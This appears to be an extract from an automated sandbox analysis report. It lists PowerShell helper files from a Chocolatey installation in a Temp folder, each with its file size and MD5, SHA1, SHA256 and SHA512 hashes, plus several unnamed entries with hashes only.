MD5ad2bfc08f21fab0d3d5e8634f3ac82c9
SHA1159b80e6a1d3bcd50e0a1a403e19f554a25f8b59
SHA2567302f0b4575fa5ce71f9ab16908ddfbc30da07c42a01c5c38b1c74a17c0b6268
SHA512e9c2dd86363d09a13afc5f73720a4d254c649fc48589f1f526fcf0055e37802ed6e98c1ac077c321b994f6b7325864b6980a279f401461f956d899d1f388bffe
-
C:\Users\Admin\AppData\Local\Temp\chocolatey\chocoInstall\tools\chocolateyInstall\helpers\functions\Install-ChocolateyShortcut.ps1
Filesize20KB
MD5dfc2bffae8b421ad0c75ed88428f53fe
SHA1d9b115c9a93236b100925c317433c0afc338d142
SHA25631bd5702dc460a1b0f0ecb860def0060791012fffccfb94e0c58fc81b8c7bb4a
SHA51228915e9691ce39f9a36e1e5dedcc33fa41472509480b9d7816abaaab4b592e234ed0458aa3ea38acb80b8a5e35bb8f9d1d65ec7e5e08fbca7d458bc804503c5e
-
C:\Users\Admin\AppData\Local\Temp\chocolatey\chocoInstall\tools\chocolateyInstall\helpers\functions\Install-ChocolateyVsixPackage.ps1
Filesize21KB
MD54a2f0338ccf1959785184b7eb730721c
SHA1b8d8ce2fbb7255b5939b123ac6fdc09249f6897b
SHA25607feb1ae0e4085b792640fa1c0b6b4075ddd0ee2f1e26b6436d7386099d1d682
SHA51265632794114e46301e735cf7d62cc8f32f5f52b8839397b79f0715176adc98259a2e8aa2743a7b759952967f9d2b5cc4e3a45140c4e0c8545e739ef600d42c15
-
C:\Users\Admin\AppData\Local\Temp\chocolatey\chocoInstall\tools\chocolateyInstall\helpers\functions\Install-ChocolateyZipPackage.ps1
Filesize22KB
MD51d684ab70c521d120dd6c85ae49c0856
SHA122d62dc1790335b282ffae83ae99e5046acc697d
SHA256ebb3a5f2e94b3e3f64df637e3b31100df6066d06e9838388580594684ce51af8
SHA5129b5208220080e62383eb1bfda289aff9c56bd75a784fb52f74ee151ac6e5eb267afa4d304ce669ac01c8015ace7b6ef959ecd9b766d4146b5df6b7d936940a72
-
C:\Users\Admin\AppData\Local\Temp\chocolatey\chocoInstall\tools\chocolateyInstall\helpers\functions\Install-Vsix.ps1
Filesize14KB
MD593edad8aba1510faf431ffa81786c2c9
SHA1b46ec859f7cbbe475271d3a76000a13f8f99aa5d
SHA256c9ba7fb9f45f00599e706a8debaa7d507c9f4d6a1243d75e22ebace5ad44c348
SHA512a0ab2d780e9a51fc1b511dd6993d890ae0174f2396e129cf74c4a915533183e4f0bcf298eb414d3c7c92fcef9dc0ddbc8322ce982fcfc775652ef291b9bdc124
-
C:\Users\Admin\AppData\Local\Temp\chocolatey\chocoInstall\tools\chocolateyInstall\helpers\functions\Set-EnvironmentVariable.ps1
Filesize17KB
MD504e81c7147453c502bb82d0770e7535b
SHA1bfe2266de2662a42b905093d703140eb5830885c
SHA256b2358bf013443f7a49120406d8539b42015c44d889cfaf0a8ba6bb308d1da059
SHA512fd5c1e2f2b4ac9aa99fe271cc9e80ed9c48900ffa73332898f34337abf9b3e8e002c54c26481f37907d39e3598cf44605763b4268161082441b230b6cf9bfde2
-
C:\Users\Admin\AppData\Local\Temp\chocolatey\chocoInstall\tools\chocolateyInstall\helpers\functions\Set-PowerShellExitCode.ps1
Filesize14KB
MD565d91db5463e0628eeaff651c2f3c68e
SHA1fc4f153985ee92db1b44c7d3ddbf3b1683c6b3b6
SHA2560868fc39ac41bdfec95c3b15404d671fb5063b7fa9d303c319be590f4af06684
SHA512d53cd996fbf4f322c156df45696a321d1ef666354a77204b25dba13155a0e3d741ffeb1fba113e46f637fcf829f542b62c52f429a1979a76ade7ffeaa7b7a7fa
-
C:\Users\Admin\AppData\Local\Temp\chocolatey\chocoInstall\tools\chocolateyInstall\helpers\functions\Start-ChocolateyProcessAsAdmin.ps1
Filesize28KB
MD5b94b36820be3a125d6f1c83bedd68fd0
SHA1f7b1c0deea955181dfb94d5ddd720c77852d4f64
SHA256388b12c4311c345efb4d15a790399b08548843468462249974d2a5b64d8d22ab
SHA51235f3891de34e46be680535f4ef992847b928559badc36d2513f45ea198b02a4e3101b9fe019e96202a9632f0ba8bda74cfd9ae56b95e19c72947230594ab4e5c
-
C:\Users\Admin\AppData\Local\Temp\chocolatey\chocoInstall\tools\chocolateyInstall\helpers\functions\Test-ProcessAdminRights.ps1
Filesize14KB
MD54851178c4733218dc8992da236af5c4b
SHA165cf74708176962cf745f4e97f01a8b71737540f
SHA25694fe9000ef933259c60bc68d0b11b7c965d3284b30f636a476dafd3651f0f0fa
SHA512f5b4ccc4963d65bb2cbad89478abc20f54fc6afea1bf61606064ad08297d123427bcb172add49910bd80530ccdf18948efa1f8cac77e6ad8183a08d6b4b7ad52
-
C:\Users\Admin\AppData\Local\Temp\chocolatey\chocoInstall\tools\chocolateyInstall\helpers\functions\UnInstall-ChocolateyZipPackage.ps1
Filesize15KB
MD5db507d55807bc21fd989216c2c7264b3
SHA1481f989e5e2d27b88154e9a33729bd985ea4ba27
SHA256893e740ac400595638e81d50c72ccf9ced01ca6c569c5bad5027bac794eb0ccb
SHA512810e16add341766a153907240ae72b5884db47b4b9ac9e51f53ee326fe395e79471e81f2eaa831347eda33b4ab6be5ade20e0ecc5c72e738bfce0385dd03846b
-
C:\Users\Admin\AppData\Local\Temp\chocolatey\chocoInstall\tools\chocolateyInstall\helpers\functions\Uninstall-BinFile.ps1
Filesize16KB
MD5b11b456e104e903220877409825ec718
SHA17c9090f672f58bd214db399240b3cefeb90a4800
SHA25636ccadf7833e836e2e2b08cd291f996cc8d1dc70dbbeda131961232a85f93a6d
SHA51298e29ae9bacf5afe83506016517df538deae9784bb7782a54a73d556b4e0b1d1478d20d45a80afabd5f66f6050855277dd6fb7fdf666dcaa9bce1968c57de969
-
C:\Users\Admin\AppData\Local\Temp\chocolatey\chocoInstall\tools\chocolateyInstall\helpers\functions\Uninstall-ChocolateyEnvironmentVariable.ps1
Filesize15KB
MD5c168cd84accbdbd3c6a7c5d6ccaf9322
SHA1480d872b2f0a05f1eb9a935acd0ad168824b83ec
SHA2560eeb735de89d567c7e235ba4be76721f6412412f659dea32b0f0be7a7112fdf0
SHA5122371b7d563dc814db1730d0e97bee5123788c6bfdff4644503bb8541545f171a27cb09f75372697d7aeeade26e39c5ec151ccd74a8bb3f08cd16a33018fc897b
-
C:\Users\Admin\AppData\Local\Temp\chocolatey\chocoInstall\tools\chocolateyInstall\helpers\functions\Uninstall-ChocolateyPackage.ps1
Filesize18KB
MD5ce447aa35b1ee9b0442bc60ed25fa601
SHA1c3e95a121aed1e550123398328a80486c1ba8831
SHA256a382b442261f72d7183df6aa0a03f7227001530ca251976ad10c1f1efe3bfdb9
SHA512cf5c4d721f218f7de17acc79245a95035c1e5a5dad74886deb677ba02b144435e19b6c22896adac6ad9cb22b076329278ba36a6eda47143012f7f749a8449a32
-
C:\Users\Admin\AppData\Local\Temp\chocolatey\chocoInstall\tools\chocolateyInstall\helpers\functions\Update-SessionEnvironment.ps1
Filesize16KB
MD530a1508219818eb2c0466de48e85ec08
SHA1cfeeba315c9ee297a8f807ad2a2b702e6999d800
SHA2563cfa5c1d19b3a7ce0e1c9b658fb6e615d24e508b1c247495478fc657c7c6db18
SHA51234aba955d0d971a5116be3e37339e7916e40b8be056d570eddea1f5a7d60e184acc882722e23d3db069136d70799961b5d5039f951119263a247af26808f8772
-
C:\Users\Admin\AppData\Local\Temp\chocolatey\chocoInstall\tools\chocolateyInstall\helpers\functions\Write-FunctionCallLogMessage.ps1
Filesize14KB
MD5228831acddfa071b1b47b11bc68ec101
SHA1d5b1666c77c42ae8d9f790aba22c2ee35871e338
SHA2563db43887af0d89c846894df0d1707a0dd1e49f674f77d41f394cfbbffb65f9a2
SHA512625cad1549532da7f889ac726e4558d9f18fe7762b440b629781f8d685f1ea6430ee635f3819af1498beebfa101a614146a70112cfe0f2774c7eb6f8129b9b9c
-
C:\Users\Admin\AppData\Local\Temp\chocolatey\chocoInstall\tools\chocolateyInstall\redirects\cinst.exe.ignore
Filesize2B
MD581051bcc2cf1bedf378224b0a93e2877
SHA1ba8ab5a0280b953aa97435ff8946cbcbb2755a27
SHA2567eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6
SHA5121b302a2f1e624a5fb5ad94ddc4e5f8bfd74d26fa37512d0e5face303d8c40eee0d0ffa3649f5da43f439914d128166cb6c4774a7caa3b174d7535451eb697b5d
-
C:\Users\Admin\AppData\Local\Temp\chocolatey\chocoInstall\tools\chocolateyInstall\tools\7z.dll.manifest
Filesize513B
MD58f89387331c12b55eaa26e5188d9e2ff
SHA1537fdd4f1018ce8d08a3d151ad07b55d96e94dd2
SHA2566b7368ce5e38f6e0ee03ca0a9d1a2322cc0afc07e8de9dcc94e156853eae5033
SHA51204c10ae52f85d3a27d4b05b3d1427ddc2afaccfe94ed228f8f6ae4447fd2465d102f2dd95caf1b617f8c76cb4243716469d1da3dac3292854acd4a63ce0fd239
-
Filesize
45KB
MD57e5148aef234b7bf3089b404005c8862
SHA141b38387db19688a275d910dc9a5d7608cc01bb9
SHA2563b39a40e0589a088c3e205f59c36c5b8bf3e2ef7d327201c7aa65630e82dacf9
SHA5124521fa17193ec232912becebf34b3b922269c1c22d6bd1d7e3e7165b9ab896446e9694715092af36955083da5b8dad15c055dfc9c3bb57447c40a5313cf277e6
-
Filesize
232B
MD594decd94cf0f232553d08756df1d4783
SHA1e8fdabc1f6400439bbe1e24cfbf51ff35f5c7d8c
SHA256d1a1cc2c03e54891e0907083cb0e175fafb704765cd4c2faf0c58034e77ff9b3
SHA5120bc29bc45830562b6b58242b2fa6e2da2e22fb0ef56e2f2e22607b3a6b93a08e206ed4a6e4a12f7f64a8dafe863c5a058d7000dba41e962d9469b336b35ca56a
-
Filesize
191KB
MD5beea54e7ce7c1890d77705152d796c54
SHA1e09ba55155c68cccf535ca5b8215c0af7945ae90
SHA256ca8db518214c0edd310b27a8ca8b45eac5ee9b88d5ea91bf742737829d2bd939
SHA512ef444be86a99fe290046ead2400e9142fa7c2d2e0e829843ede256bdfd7f989ed8b02b079ba681d04c606db9bc5fe391ead85537b2bf21f37e4365d2468b9101
-
Filesize
213KB
MD5900c5a833594f338fe000ce9a8a8dcf2
SHA1fa1287ad8ebc113e73da60fcc093de4d0dae4c52
SHA256b1e3fe57ba73884c06c9968d9313f3340f5f15bc1aa43ee234af0c8becefcdae
SHA5121354085a3d86f8c42846f081e223d42804c405cdbf1c977c39d00708920b63243e6d8cd5c0c396d3dd2cd930eb564191bb2127f761c2b6ef3606cabbc5b00bb7
-
Filesize
338KB
MD5af22398e705ac155845abc6c932357ff
SHA1143b8d2fdcdadd08174cc789e299e7a8d9435d67
SHA256653e330303af8be750f3d61f6eb6f91d407ba6607ea433a70723a56434654ec2
SHA512ead88de96961ab0128af611b53392d3123ca2f76ef0fe4ed211e761d4d428895dff767fc2683f9fba92313027e657bb6b0b03a11ebf38bcf2d92d92e4ffdecad
-
Filesize
23KB
MD59702ccb0342d9da626d302bf72049c69
SHA1924dc3a99f756b19fe5330f8f44897139b831163
SHA2560383ff399f8a67e5be01cd46edac268cd04f952c659081c79fe32d9d8865e1f5
SHA5126734d98707617840a516fb8f9fce977f1ddcf701c9ab12a07243a05beac820f0a9ad0191dd9624d476fa2cd6fc795579008e7d8ae283044de161908cf5b1cdc6
-
Filesize
23KB
MD59702ccb0342d9da626d302bf72049c69
SHA1924dc3a99f756b19fe5330f8f44897139b831163
SHA2560383ff399f8a67e5be01cd46edac268cd04f952c659081c79fe32d9d8865e1f5
SHA5126734d98707617840a516fb8f9fce977f1ddcf701c9ab12a07243a05beac820f0a9ad0191dd9624d476fa2cd6fc795579008e7d8ae283044de161908cf5b1cdc6